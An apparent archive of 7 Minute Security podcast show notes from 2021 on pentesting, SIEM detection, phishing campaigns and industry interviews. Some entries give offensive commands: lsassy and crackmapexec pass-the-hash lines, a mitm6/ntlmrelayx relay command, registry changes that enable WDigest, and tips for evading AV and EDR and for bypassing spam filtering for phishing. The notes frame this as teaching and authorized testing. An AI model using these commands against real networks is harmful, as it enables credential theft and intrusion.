• You can schedule VMs to auto-shutdown at a certain time each day, and even have Azure send you a notification before the shutdown so you can delay - or suspend altogether - the operation
• VMs are by default (I believe) joined to Azure AD, which I don't want. Here's how I got machines unjoined from Azure AD and then joined to my pwn.town domain:
• Accidentally provision a VM in the wrong subnet? The fix may be rebuilding the flippin' VM (more info in today's episode).
• Just about every operation takes for freakin' ever. And it's confusing because if you delete objects out of the portal, sometimes they don't actually disappear from the GUI for like 5-30 minutes.
• Using backups and snapshots is archaic. You can take a snapshot in the GUI or PowerShell easy-peasy, but if you actually want to restore those snapshots you have to convert them to managed disks, then detach a VM's existing disk, and attach the freshly converted managed disks. This is a nightmare to do with PowerShell.
• Deleting data is a headache. I understand Azure is probably trying to protect you against deleting stuff and not being able to get it back, but they night a right-click > "I know what I'm doing, DELETE THIS NOW" option. Otherwise you can end up in situations where in order to delete data, you have to disable soft delete, undelete deleted data, then re-delete it to actually make it go away. WTH, you say? This doc will help it make more sense (or not).
• Promiscuous mode - just plain does not work as far as I can tell. So I can't do protocol poisoning exercises with something like Inveigh .
• Hashcat - I got CPU-based cracking working in ESXi by installing OpenCL drivers, but try as I may, I cannot get this working in Azure. I even submitted an issue to the hashcat forums but so far no replies.

View this episode's show notes for more information

Published: Thursday, December 30, 2021

Today's episode is brought to us by Manscaped . Get 20% off your order + free shipping with the code 7MS at Manscaped.com Today we're closing down 2021 with a tale of pentest pwnage - this time with a path to DA I had never had a chance to abuse...

• Grab Certi
• Grab Certify

View this episode's show notes for more information

Published: Wednesday, December 22, 2021

HAPPY 500 EPISODES, FRIENDS! That's right, 7MS turned 5-0-0 today, and so we asked John Strand of Black Hills Information Security to join us and talk about all things security, including the John/BHIS superhero origin story, the future of pentesting, the...

View this episode's show notes for more information

Published: Thursday, December 16, 2021

Today we have some cool updates on this SIEM-focused series we've been doing for a while. Specifically, I want to share that one of these solutions can now detect three early (and important!) warning signs that bad things are happening in your environment:.

• ASREPRoasting
• WDigest flag getting flipped (reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1)
• Restricted admin mode getting enabled (reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f) - see n00py's blog for more info

View this episode's show notes for more information

Published: Wednesday, December 15, 2021

Hi everybody, today we're continuing a series we started way back in June called Securing Your Mental Health . Today I talk about some easy and relatively cheap things I'm doing to try and shutdown negative thoughts, punch imposter syndrome...

View this episode's show notes for more information

Published: Thursday, December 02, 2021

Hey friends, today I'm giving you a peek behind the curtain of our Light Pentest LITE training to talk about the software/hardware we use to make it sing, the growing pains - and OMG(!) moments - that forced us to build in more infrastructure redundancy,...

View this episode's show notes for more information

Published: Wednesday, November 24, 2021

Today's episode is brought to us by Manscaped . Get 20% off your order + free shipping with the code 7MS at Manscaped.com Today's tale of pentesting has a bunch of tips to help you maximize your pwnage, including:I close out today's episode with a...

• The new Responder DHCP poisoning module
• All the cool bells and whistles from CrackMapExec which now include new lsass-dumping modules !
• Speaking of lsass dumping, here's a new trick that works if you have Visual Studio installed (I bet it will be detected soon).

View this episode's show notes for more information

Published: Wednesday, November 17, 2021

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Today we continue our...

• RDP from public IPs
• Password spraying
• Kerberoasting
• Mimikatz
• Recon net commands
• Hash dumping
• Hits on a "honey domain admin" account
• Users with non-expiring passwords
• Hits on the SSH/FTP/HTTP honeypot

View this episode's show notes for more information

Published: Wednesday, November 10, 2021

Today we chat with Josh Burnham, Security Operations Manager at Liquid Web . As someone who helps support and secure a hosted environment, Josh sleeps with one eye open...

• How security in a hosting environment has changed from "back in the day" to today
• Tips for running a successful bug bounty program
• Why your organization might want to utilize a security.txt file
• Tips on dealing with the grind of an information security career and how to stay mentally/physically
• Things to NOT assume when migrating servers and services to a hosting provider
• How you shouldn't be afraid of mistakes (but should try your best to make informed, educated ones :-). Jayson Street has some great stories in this vein!
• The importance of backups, and why "The condition of any backup is unknown until a restore is attempted." - Schrödinger’s Backup

View this episode's show notes for more information

Published: Tuesday, November 09, 2021

Hey, remember back in episode #357 where we introduced 7MOIST (7 Minutes of IT and Security Tips)? Yeah, me neither :-). Anyway, we're back with the second edition of 7MOIST and have some cool pentesting and general IT tips that will...

• Stuck on a pentest because EDR keeps gobbling your payloads? SharpCradle might just save the day!
• CrackMapExec continues to learn new awesome tricks - including a module called slinky that plants hash-grabbing files on shares you have write access to!
• Browsing 17 folders deep in Windows Explorer and wish you could just pop a cmd.exe from right there? You can! Just click into the path where you're browsing, type cmd.exe, hit Enter and BOOM! Welcome to a prompt right at that folder!

View this episode's show notes for more information

Published: Thursday, October 28, 2021

Hello friends! We're long overdue for a tale of pentest pwnage, and this one is a humdinger! It's actually kind of three tales in one, focusing on pentesting wins using:.

• Manual "open heart surgery" on the root of the Active Directory domain
• The new totally rad DHCP poisoning module of Responder
• An opportunity to abuse GPOs with SharpGPOAbuse (P.S. we talked about this tool about a year ago in episode 441 )

View this episode's show notes for more information

Published: Wednesday, October 20, 2021

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Today we're joined by...

• History on cyber insurance - who's buying it, what it does and doesn't cover, and when it started to be something you didn't want to leave home without
• What are insurance companies asking/demanding of customers before writing a cyber insurance policy?
• What basic things organizations can do to reduce malware/ransomware incidents (whether they are considering a cyber insurance policy or not)?
• How do I evaluate the various insurance carriers out there and pick a good one?

View this episode's show notes for more information

Published: Wednesday, October 13, 2021

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Hey friends! Today we're going to recap...

View this episode's show notes for more information

Published: Wednesday, October 06, 2021

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Today we're talking...

• Kerberoastable and ASREPRoastable users
• Plain text passwords lingering in Group Policy Objects
• Users with never-expiring passwords
• Non-supported versions of Windows
• Machines configured with unconstrained delegation
• Attack and escalation paths to Domain Admins

View this episode's show notes for more information

Published: Wednesday, September 29, 2021

Today we continue our series focused on building a security consultancy and talk about:.

• A phishing campaign that went off the rails, and lessons learned from it
• First impressions of an awesome tool to help add MFA to your Active Directory (not a sponsor)
• A tangent story about how my wife brought some thieves to justice!

View this episode's show notes for more information

Published: Tuesday, September 28, 2021

Hey friends! Today I've got some exciting personal/professional news to share: our Light Pentest eBook - which is a practical, step-by-step playbook for internal network penetration testing - is now available for purchase!Note: this eBook and the [Light...

• Grabbing and analyzing packet captures
• Abusing insecure network protocols
• Exploiting (the lack of) SMB signing
• Capturing, cracking and passing hashes
• Locating high-value targets with DNS zone transfers
• Exploiting vulnerable Group Policy Objects
• Scraping screenshots of Web interfaces with WitnessMe
• Finding and cracking "Kerberoastable" and "ASREPRoastable" Active Directory accounts
• Dumping, passing and cracking hashes from domain controllers

View this episode's show notes for more information

Published: Wednesday, September 22, 2021

Today our good buddy Joe Skeen and I virtually sit down with Matt Quammen of Blue Team Alpha to talk about all things incident response!...

• Top 5 things to do and not do during ransomware event
• Challenges when responding to ransomware events
• Opportunities to break into infosec/IR
• The value of tabletop exercises, and some great ideas for conducting your own
• Incident response stress and success stories
• Cyber insurance - worth it or not?

View this episode's show notes for more information

Published: Wednesday, September 15, 2021

Today our friend Christopher Fielder from Arctic Wolf is back for an interview four-peat! We had a great chat about making sense of vendor alphabet soup terms (like SIEM, SOC, EDR/MDR/XDR, ML, AI and more!), optimizing your SOC to "see" as much as possible, tackling...

View this episode's show notes for more information

Published: Wednesday, September 08, 2021

This episode of 7 Minute Security is sponsored by Datadog. Now offering Cloud Security Posture Management (CPSM), Datadog provides one-click compliance posture. Built on the unified Datadog Agent and platform-wide cloud integrations, you can easily get set up minutes. Try it for yourself today...

• Simple pricing model
• Easy to use dashboard
• Cool "marketplace" of integrations you can add to your instance and start getting alerts for
• Nice API integration that seemed pretty simple to use - and that covers a lot of different cloud products and services
• Ticket dashboard looked straightfoward to use and interpret
• Can quickly add IPs/subnets that you don't want to monitor, if appropriate

View this episode's show notes for more information

Published: Wednesday, September 01, 2021

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Today we continue our series we started...

View this episode's show notes for more information

Published: Friday, August 27, 2021

Today we're continuing our discussion on phishing campaigns - including a technical "gotcha" that might redirect your phishing emails into a digital black hole if you're not careful!As I mentioned last week, I've been heavy into spinning up and tearing down phishing campaigns, so I finally got...

• Mail flow > Message Trace > Start a trace then make the Sender field be the user you're sending phishing emails from. That showed me that my phishes were being quarantined!
• Apply this rule if > The sender's domain is > yourphishingdomain.com
• Set the spam confidence level (SCL) to...Bypass spam filtering
• Modify the message properties...set a message header...X-MS-Exchange-Organization-BypassClutter

View this episode's show notes for more information

Published: Thursday, August 19, 2021

Today we're revisiting how to make a kick-butt cred-capturing phishing campaign with Gophish , Amazon Lightsail , LetsEncrypt , ExpiredDomains.net and a special little...

• After domain registration, log into admin.google.com or click Manage Workspace button at checkout.
• At the next screen click Workspace Admin Console. Sign in with the person you’ll be spoofing from, and the temporary password emailed to your backup email account during checkout.
• In the search bar search for Less Secure Apps, choose Allow users to manage their access to less secure apps.
• Now, in the upper right, hit Manage Your Google Account.
• Under Security, click Protect your account and click Add phone number. Finish that process, then click Continue to your Google account.
• Back at the main admin page, under Less secure app access, click Turn on access (not recommended).
• At the next screen click Allow less secure apps: ON
• Back at the main screen, click 2-Step Verification and set it to On.
• Back at the main screen again, a new option called App passwords should be there. Click it. Choose to generate a custom name like LOL and then then an app password will appear. Write it down as it only appears once!

View this episode's show notes for more information

Published: Thursday, August 12, 2021

This episode of 7 Minute Security is sponsored by Datadog. Now offering Cloud Security Posture Management (CPSM), Datadog provides one-click compliance posture. Built on the unified Datadog Agent and platform-wide cloud integrations, you can easily get set up minutes. Try it for yourself today...

• Arctic Wolf
• Elastic
• Milton Security
• Protocol46
• Sumo Logic

View this episode's show notes for more information

Published: Friday, August 06, 2021

Hey friends, today we're talking about a new security training offering 7MinSec has created called Light Pentest LITE - Live Interactive Training Experience . It's a 3-day course (with each class session being 3 hours long) consisting of live (via Zoom),...

View this episode's show notes for more information

Published: Thursday, July 29, 2021

This episode of 7 Minute Security is sponsored by Datadog. Now offering Cloud Security Posture Management (CPSM), Datadog provides one-click compliance posture. Built on the unified Datadog Agent and platform-wide cloud integrations, you can easily get set up minutes. Try it for yourself today...

• Do a straight-up hashcat crack against the PwnedPasswords list (at time of this writing I don't have a good source for the cracked versions of these passwords. I used to grab them at hashes.org. Anybody got an alternative?
• Do a straight-up hashcat crack through the RockYou2021 list
• Run the hatecrack methodology, including the quick crack, the quick crack with rules (I'm partial to OneRuleToRuleThemAll ), and brute-forcing all 1-8 character passwords

View this episode's show notes for more information

Published: Wednesday, July 21, 2021

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Today we're talking...

• Wherever you spin up your CS instance, it's probably a good idea to lock down the firewall to only specific IPs. With Digital Ocean, I found this article helpful.
• When generating CS listeners, the C2Concealer from FortyNorth helped me get malleable C2 profiles generated while creating a LetsEncrypt cert at the same time!
• My CS beacons kept getting gobbled by AV, but the following resources helped me get some stealthy ones generated: Artifact Kit , PEzor and ScareCrow . Here's a specific ScareCrow example that flew under the EDR radar:
• PowerUpSQL is awesome for finding servers where you can run stored procedures to send your attacking box a priv'd hash to pass/capture/crack. Check out this presentation on PowerUpSQL to find vulnerable targets, then use mssql_ntlm_stealer module in Metasploit to have fun with the account hashes. Be sure to set your domain when configuring the Metasploit module!
• When trying to pop an SMB shell with relay tools, I've had problems recently with those attempts being stopped by defensive tools. Then I found this gem which talks about tweaking smbexec.py to evade AV. It worked a treat!
• When you use MultiRelay , I had no idea that it includes an upload function so you can simply upload your beacon.exe from a SYSTEM shell and fire it right from a command line. Cool!
• Once my beacons started firing around the pentest environment, I temporarily allowed all IPs to talk to my Digital Ocean box - just because the IP I grabbed from a "what is my IP?" Google search didn't always match the actual beacons that called home. Once the beacon connectivity was established, I tweaked the beacon firewall rules to just let certain IPs in the door.
• This Cobalt Strike Extension Kit was FREAKING sweet for adding "right click > do awesome stuff" functionality to CS like dump hashes, search for Kerberoastable accounts, setup persistence, etc.
• Got a SYSTEM level shell but need to abuse a DA's privs? Tell the beacon to pull back a list of running processes, then click one (like explorer.exe) running under a DA's account and then impersonate it to add your account to the DA group!
• Having issues dumping LSASS? This article from Red Canary gives you some great ideas to do it in a way that doesn't make AV throw a fit!
• Trying to RDP using PtH? This article will help you out. And if you get warnings about not being able to RDP in because of some sort of login restriction, try adjusting this reg key with CME:

View this episode's show notes for more information

Published: Friday, July 16, 2021

This episode of 7 Minute Security is sponsored by Datadog. Now offering Cloud Security Posture Management (CPSM), Datadog provides one-click compliance posture. Built on the unified Datadog Agent and platform-wide cloud integrations, you can easily get set up minutes. Try it for yourself today...

View this episode's show notes for more information

Published: Thursday, July 08, 2021

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Yeahhhhhh! Today's another fun tale of...

• The importance of starting your pentest with an AD account that actually has access to...ya know...stuff
• The importance of starting your pentest plugged into a network that actually has...you know...systems connected to it!
• This BHIS article is awesome for finding treasures in SMB shares
• PowerUpSQL audits are a powerful way to get pwnage on a pentest - check out this presentation for some practical how-to advice
• IPMI/BMCs often have weak creds and/or auth bypasses so don't forget to check for them. Rapid7 has a slick blog on the topic.
• Don't forget to check for vulnerable VMWare versions because some of them have major vulnerabilities

View this episode's show notes for more information

Published: Wednesday, June 30, 2021

Hey friends! Today we're dusting off an old mini-series about password cracking in the cloud (check out part 1 and part 2 ) and sharing some awesome info on building a...

• 100 LM hashes discovered, all cracked in 7 minutes (heh, 7 minutes :-)
• Ran hatecrack's quick crackw ith no rules: done in 7 minutes, cracked 108 accounts
• Quick crack against one rule to rule them all : ran in 25 minutes, got got 271 new passwords
• Ran extensive hatecrack methodology, it ran for a little over 2 hours and got 88 new passwords.
• Last Comic Standing was the show I couldn't think of during the episode :-)
• After a toxic non-toxic foam pit incident a few years ago, my family and I had another injury this weekend with a rented waterslide - the fun ended in a concussion!

View this episode's show notes for more information

Published: Thursday, June 24, 2021

Hey everybody! Today Joe and I sat down with Nikhil Mittal of Pentester Academy and Altered Security to talk about a whole slew of fun security topics:.

• How Nikhil first got involved in Pentester Academy
• Nikhil's hacker origin story
• How does Nikhil feel about his tools being used by baddies?
• What security tools/defenses would be good for SMBs to focus on?
• Active Directory security - is all hope lost?
• Will AI, ML, Terminator robots, etc. replace all of us who do pentesting for a living?

View this episode's show notes for more information

Published: Wednesday, June 16, 2021

Today our good pal Christopher Fielder from Arctic Wolf is back for an interview three-peat! He joins Joe "The Machine" Skeen (a.k.a. Gh0sthax ) and I to talk about all things ransomware, including:.

• How the Colonial Pipeline incident may have started from a weak VPN cred with no MFA . Silver lining (?) - they got some of the $ back .
• Was the federal government's response good enough? What should the government be doing to better handle and manage ransomware?
• Common ways ransomware gets in our environments, and some ways to NOT get ransomware'd:Use 2FA (make sure that all accounts are using it!)Consider having (if possible) your AD user scheme be something like chi-user4920394 instead of Joe.PresidentHave users that haven't logged in for X days get automatically locked outTrain your users - consider Arctic Wolf's managed security awareness offeringDetect early signs of compromise like Kerberoasting Lock down your DNS egress to only specific servers so that it doesn't run "wide open"Leverage good threat intel
• Common ways ransomware gets in our environments, and some ways to NOT get ransomware'd:Use 2FA (make sure that all accounts are using it!)Consider having (if possible) your AD user scheme be something like chi-user4920394 instead of Joe.PresidentHave users that haven't logged in for X days get automatically locked outTrain your users - consider Arctic Wolf's managed security awareness offeringDetect early signs of compromise like Kerberoasting Lock down your DNS egress to only specific servers so that it doesn't run "wide open"Leverage good threat intel
• Use 2FA (make sure that all accounts are using it!)
• Consider having (if possible) your AD user scheme be something like chi-user4920394 instead of Joe.President
• Have users that haven't logged in for X days get automatically locked out
• Train your users - consider Arctic Wolf's managed security awareness offering
• Detect early signs of compromise like Kerberoasting
• Lock down your DNS egress to only specific servers so that it doesn't run "wide open"
• Leverage good threat intel

View this episode's show notes for more information

Published: Wednesday, June 09, 2021

Hey everybody, happy June! Our pal Joe is back to cover some great security stories with us, including:.

• Peloton's leaky API
• Some Colonial Pipeline discussion ( story 1 , story 2 )
• Amazon Sidewalk doesn't really share your Internet connection with neighbors/strangers. The Hacker News article doesn't do an awesome job of clearing that up either.

View this episode's show notes for more information

Published: Wednesday, June 02, 2021

Today we're doing something new - a first impressions episode of Meraki networking gear. Note: this is not a sponsored episode, but rather a follow up to episode #460 where I talked about throwing all my UniFi gear into the...

• Super easy plug-and-play setup
• The mobile app can control just about everything - ports, SSIDs, Internet on/off timers and more!
• Verbose logging
• Top-notch support from experienced technicians
• Cost! Big $$$
• "Cloud only" - can't install this gear in a LAN-only configuration
• Client VPN is a bit clunky to setup

View this episode's show notes for more information

Published: Wednesday, May 26, 2021

Hey friends! Today we're talking with Philippe Humeau, CEO of CrowdSec , which is "an open-source massively multiplayer firewall able to analyze visitor behavior & provide an adapted response to all kinds of attacks. It also leverages the crowd power to generate a global...

• What is CrowdSec?
• What problem does it solve?
• Who are your competitors?
• You're open source...so how do you make $? What's your five-year plan?
• You're dealing with a lot of data and metrics...how are you handling data privacy laws and concerns such as GDPR?
• What if I fall in love with CrowdSec and want to contribute to making it better?

View this episode's show notes for more information

Published: Thursday, May 20, 2021

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Today we continue the...

• Keeping a log and procedure for sanitizing systems
• Keeping a log and procedure for provisioning systems
• A big "gotcha" to be aware of when using Windows system dropboxes - make sure your Windows user account doesn't expire, because Splashtop doesn't have any way to update it! To prevent this, set the account not to expire:
• If you want more tips on building pentest dropboxes, check out this series

View this episode's show notes for more information

Published: Wednesday, May 12, 2021

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Hey everybody! I stayed in a hotel for...

• Reduce layers of people complexity - don't have 17 of your people on the client intro/pitch call and then ghost them once they actually want to buy something!
• Keep project management just complicated enough - I like project management tools and spreadsheet task-trackers like Smartsheet but I'm trying to let the client lead as far as how much detail they need when tracking their projects. By default, we create a document with a high level map of project milestones, timelines and key contact information. We update that as often as the client likes.
• Personalize responses to Web leads - if you have an info@ or sales@ address for your business, I think you should personalize the response you give folks who write in. They wrote you for a reason! Don't just copy/paste some generic "Hey you wanted info about our company so here it is blah blah blah" response, that doesn't make people feel like you give a rip about their needs. Think of something personal to say in the reply. "Oh, I see you're in Minnesota. I'm a big Twins fan!" Something like that. Simple, easy and personal.
• Don't sign people up for junk without asking - in this episode I give an example of a vendor we looked at (but didn't select) for some services, and the company decided to automatically sign ups up for a bunch of electronic and paper mailings. That's super annoying!
• Don't stink at LinkedIn - in the last episode of this series, I told you about a guy who (to me) wins LinkedIn and the Internet because he sent me a personalized video LinkedIn invitation - it was awesome! Be more like that guy, and less like the mosquitoes who send invites like "Hi, I noticed you're human and figured we should be LinkedIn BFFs" and then sign you up for a non-stop barrage of sales pitches!
• Bug people "just enough" - if you've had an awesome scoping call for a potential project and the client has received and reviewed the SOW, stay in touch with them periodically - even if it feels like you're being ghosted.

View this episode's show notes for more information

Published: Wednesday, May 05, 2021

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Welp, I need another security...

• Courses offered on Saturday (I'm usually pooped for these sessions, but it's easier than taking time during the work week)
• Student portal - and especially the student guide! - is more polished, easy to read, and easy to copy/paste from.
• On Saturdays I'm a sleepy Brian. :-)
• I still wish the course was designed such that we would go through various hands-on-keyboard exercises with the instructor, not just watch.
• Use of Discord as main comms channel - it causes anxiety for me...too many blips and bloops and blurps with all the notifications. It's also frustrating that the instructor takes questions from Discord sometimes without repeating the question, thus making it hard to figure out what everybody was talking about if I watch the Zoom reply.

View this episode's show notes for more information

Published: Wednesday, April 28, 2021

Hey friends! Today Joe "The Machine" Skeen (a.k.a. Gh0sthax ) and I talk about some of our favorite news stories, including:.

• FBI removes hacker back doors
• NSA: 5 security bugs under active nation-state cyberattack
• Ubiquiti is accused of covering up a ‘catastrophic’ data breach — and it’s not denying it . On a side note, enjoy our podcast about how we lost our love for Ubiquiti a while back: 7MS #460: Why I'm Throwing My UniFi Gear Into the Ocean
• Codecov users warned after backdoor discovered in devops tool

View this episode's show notes for more information

Published: Thursday, April 22, 2021

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Today our friend...

• When the company has one person in charge of IT/security, how can you start taking security seriously without burning this person out? First, it's probably a good idea to take note of what you have as far as people, tools and technology to help you meet your security goals.
• Early in this process, you should inventory what you have (see CIS controls ) so you know what you need to protect. A few tools to help you get started: Nmap Rumble LanSweeper Witnessme
• Nmap
• Rumble
• LanSweeper
• Witnessme
• As you go about any phase of your security journey, don't ever think "I'm good, I'm secure!"
• Quarterly/yearly vulnerability scans just won't cut it in today's threat landscape - especially your external network. Consider scanning it nightly to catch show-stoppers like Hafnium early)
• Limiting administrative privileges is SUPER important - but don't take our word for it, check out this report from Beyond Trust for some important stats like "...enforcing least privilege and removing admin rights eliminates 56% of critical Microsoft vulnerabilities."
• Install LAPS , because if an attacker gets local admin access everywhere, that's in many ways just as good as Domain Admin!
• Train your users on relevant security topics. Then train them again. Then....again. And after that? Again.
• There are many ways to conduct tabletop exercises. They don't have to be crazy technical. Start with the internal tech teams, practice some scenarios and get everybody loosened up. Then add the executives to those meetings so that everybody is more at ease.
• How do you know when it's time to ask for help from an outside security resource?
• Not sure what kind of shape your company's security posture is in? Check out Arctic Wolf's free security maturity assessment .

View this episode's show notes for more information

Published: Wednesday, April 14, 2021

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!In the last two episodes of this series...

• Sets the timezone with tzutil /s "Central Standard Time"
• Stops the VM from falling asleep with powercfg.exe -change -standby-timeout-ac 0
• Grabs and runs a PS file that does a ton of downloading and unzipping of files with:
• Installs Windows updates with:
• Sets a new name for the machine:
• Does a set of actions depending on the IP range with this code (which sets the IP address to a variable and then does stuff if the machine sits in that subnet):

View this episode's show notes for more information

Published: Wednesday, April 07, 2021

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Today we talk through our first...

• 5 seconds go by...
• 5 days go by...
• Deep breath. Tosses doo-dad in a drawer full of past Hak5 doo-dads that didn't work that great.

View this episode's show notes for more information

Published: Wednesday, March 31, 2021

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!OK I probably say this every time, but...

View this episode's show notes for more information

Published: Wednesday, March 24, 2021

Hey friends! Warning: this is not a "typical" 7MS episode where we try hard to deliver some level of security value.Instead, today is a big, fat, crybaby, first-world problems whine-fest about how I used to love my UniFi gear for many years, but then a few weeks ago I hit...

• How I did not pirate Boson NetSim
• How I fell in love with the Edge Router X as an up-and-coming network guru
• The schedule isn't up, but I'm speaking at Secure360 this year!
• My shiny new Dream Machine had a really fun issue where one morning Internet service was dead (even though config hadn't changed in weeks), and restoring the SAME config over the RUNNING config fixed the issue. Whaaahhhh?
• The Dream Machine GUI (at the time) doesn't have all the options one might need to stand up a site to site VPN. Neat.
• After a firmware update, my wifi started going down from 8:00 a.m. - 8:07 a.m. every morning. Were one of you hacking me? WERE ONE OF YOU HACKING ME!
• Once I got a BeaconHD , I got a new fun issue where if you were connected to it and submitted a wifi voucher, the Beacon wouldn't properly recognize it and let you on the Internet until about 5 minutes later. Guests loved that! And by "loved that" I mean "hated that."
• After upgrading UDM firmware again, a new nifty issue popped its head up which broke all my inter-VLAN rules. Yay!
• I threw hundreds of dollars at new UniFi switches and access points to solve all these problems, and everything worked perfectly (until it didn't).

View this episode's show notes for more information

Published: Wednesday, March 17, 2021

This episode of 7 Minute Security is sponsored by Datadog. Accelerate security investigations and break down silos between developers, security, and operations teams by correlating your threats, metrics, traces, and logs all in one place. Try it for yourself and get a free t-shirt at...

• Microsoft Exchange cyber attack - Hacker News has a nice what we know so far story, but things have evolved really fast, so make sure you check Microsoft's primary advisory , the script to run on local servers and newer updates such as the recent one-click remediation for unsupported Exchange versions
• SonicWall zero day - yuck, looks like the SonicWall troubles we talked about recently were a true zero day . In contrast to the Exchange story, it looks like SonicWall's official response offers (frighteningly?) little by way of logs and forensics to tell if you were truly popped. Either way, be sure to patch!
• Hackers attempt to contaminate Florida town's water supply - the story itself is interesting, but the way it got picked up by some outlets seems to send the message of "TeamViewer = bad" but we think the true lessons learned here are:Out of date and/or unsupported OS = badWeak credentials = badConnecting this type of equipment directly to the Internet instead of MFA + VPN = bad
• Out of date and/or unsupported OS = bad
• Weak credentials = bad
• Connecting this type of equipment directly to the Internet instead of MFA + VPN = bad
• Webshell use has doubled since last year - this article brings back some happy/frustrating OSCP experiences. To better protect your org from being pwned with Web shells, check out NSA's list of vulnerabilities commonly exploited to plant web shells
• Some great feedback from the last cyber news episode - a podcast listener offered a different take on the "sudo bug that gives root access story" that we discussed last month.

View this episode's show notes for more information

Published: Thursday, March 11, 2021

Today we're super excited to share a featured interview with Tanya Janca of WeHackPurple !Tanya has been in software development from the moment she was of legal age to work in Canada - beginning by working with some huge companies (Nokia/Adobe) before falling in love...

• How to overcome your fears and present at conferences, write blog posts and even start your own company!
• How to deal with online jackwagons who troll you online and at conferences
• The importance of finding a mentor and mentoring others
• Bob and Alice Learn Application Security - Tanya's book, available on Amazon
• Women of Security (WoSEC)
• We Hack Purple Podcast - weekly podcast with a diverse range of guests from all walks of infosec life
• We Hack Purple Community - "a Canadian company dedicated to helping anyone and everyone create secure software."
• Tanya's music on Spotify
• #CyberMentoringMonday - a hashtag that Tanya and other security professionals monitor to help people connect with cyber mentors
• InsiderPHd - has a safe space for bug bounty hunters to learn and collaborate
• WeAreHackerz - "You are welcome to join WeAreHackerz if you identify as a person of a marginalized gender, including but not limited to non-binary individuals, women (trans and cis), trans men, genderqueer, etc. We welcome members across all nationalities, races, religions, ages, or other characteristics that make each of us unique."
• Security in Color

View this episode's show notes for more information

Published: Thursday, March 04, 2021

This episode of 7 Minute Security is sponsored by Datadog. Accelerate security investigations and break down silos between developers, security, and operations teams by correlating your threats, metrics, traces, and logs all in one place. Try it for yourself and get a free t-shirt at...

• Get a cmd.exe spun up in the context of your AD user account:
• Get-DomainUser -PreAuthNotRequired - find AD users with this flag set...then crack the hash for a (potentially) easy win!
• Get-NetUser -spn - find Kerberoastable accounts...then crack the hash for a (potentially) easy win!
• Find-LocalAdminAccess -Verbose helps you find where your general AD user has local admin access!
• lsassy -d domain.com -u YOUR-USER -p YOUR-PASSWORD victim-server
• crackmapexec smb IP.OF.THE.DOMAINCONTROLLER -u ACCOUNT-YOU-DUMPED -H 'NTLM-HASH-OF-THAT-ACCOUNT-YOU-DUMPED

View this episode's show notes for more information

Published: Thursday, February 25, 2021

This episode of 7 Minute Security is sponsored by Datadog. Accelerate security investigations and break down silos between developers, security, and operations teams by correlating your threats, metrics, traces, and logs all in one place. Try it for yourself and get a free t-shirt at...

• We don't think the training/exam is for beginners, despite how its advertised
• Both the lab PDF and PowerPoint have their own quirks - which may ultimately be teaching us not to be copy-and-paste jockeys, and instead build our own study guides and cheat sheets
• Don't let the training give you the idea that most pentests have a super fast escalation path to DA (ok yes sometimes they do, but usually we spend a LOT of hours working on escalation!)
• Watch the walkthrough videos. We repeat: WATCH THE WALKTHROUGH VIDEOS!
• Although not required, we highly recommend capturing all the flags laid out for you in the lab environment
• Know how to privesc - using multiple tools/methods
• It would be to your advantage to understand how to view/manipulate Active directory information in multiple ways
• You start the exam with no tools. So how will you be ready to upload/download tools into the exam environment so you make the most of your exam time?
• Tool X might give you wrong results - or none at all - in the lab. Do you have a backup tool Y and Z that can serve the same purpose?
• You want to be very good at Kerberos ticket crafting!
• Know all the mimikatz commands and switches and when to apply them

View this episode's show notes for more information

Published: Friday, February 19, 2021

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Hey everybody! Sorry that we're late...

• I got to use some of my new CRTP skills!
• Make sure on your pentests that you're looking for "roastable" users. Harmj0y has a great article on this, but the TLDR is make sure you run PowerView with the -PreauthNotRequired flag to hunt for these users:
• Check for misconfigured LAPS installs with Get-LAPSPasswords !
• The combination of mitm6.py -i eth0 -d company.local --no-ra --ignore-nofqdn +ntlmrelayx -t ldaps://domain.controller.ip.address -wh attacker-wpad --delegate-access is reeeeeealllllyyyyyyy awesome and effective!
